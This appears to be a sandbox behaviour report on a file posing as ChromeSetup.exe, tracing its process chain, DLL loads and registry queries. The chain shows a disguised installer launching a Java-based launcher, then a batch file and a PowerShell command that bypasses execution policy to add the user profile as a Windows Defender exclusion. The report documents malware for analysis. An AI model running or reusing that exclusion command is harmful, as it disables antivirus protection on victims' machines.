Source: C:\Users\user\Desktop\ChromeSetup.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ChromeSetup.exe

Static PE information: certificate valid

Source: ChromeSetup.exe

Static file information: File size 81706848 > 1048576

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll

Jump to behavior

Source: ChromeSetup.exe

